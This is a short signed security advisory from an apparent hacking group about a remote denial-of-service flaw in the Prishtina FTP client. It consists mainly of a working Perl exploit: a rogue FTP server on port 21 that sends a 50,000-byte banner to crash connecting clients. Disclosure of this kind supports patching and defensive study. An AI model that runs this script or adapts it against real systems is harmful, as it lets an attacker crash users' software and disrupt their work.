-----BEGIN PGP SIGNED MESSAGE----- ###############################################################* # Damage Hacking Group security advisory # www.dhgroup.org ###############################################################* #Product: Prishtina FTP v.1.* #Authors: G.Syla [www.prishtina-soft.com] #Vulnerability: remote DoS ###############################################################* #Overview#------------------------------------------------------# Just ftp client.. #Problem#-------------------------------------------------------# It's possible to crash ftp-client by sending long ftp-banner to it. #Exploit#-------------------------------------------------------# #!/usr/bin/perl use IO::Socket; $host = "localhost"; $port = "21"; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n"; $data = "A"; $num = "50000"; $buf .= $data x $num; while ($client = $server->accept()) { print "OK"; print $client "$buf\n"; close($client); } #wow#-----------------------------------------------------------# %$#@ www.dhgroup.org -=> opened English version! Come on in :) #eof Best regards www.dhgroup.org D4rkGr3y icq 540981 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQCVAwUBPsxK9W4LIpseSJmPAQELvwQAt9Adn0/OjjP9tvOKL8UbyGRBacPS3Xrf X0Q5ocG/coH4hH0E9iDtHItmM8XLkhnF66FiJeBBveTSooohS73Gl9T+MNwxdT1+ 46V8SAuq0Jsz8oHTNgGJ2ZGx0E8+3rXCfmngJWSJ0SJaXcEg+a04uidLi74YN0yH RqkMTrGenPI= =3a5T -----END PGP SIGNATURE-----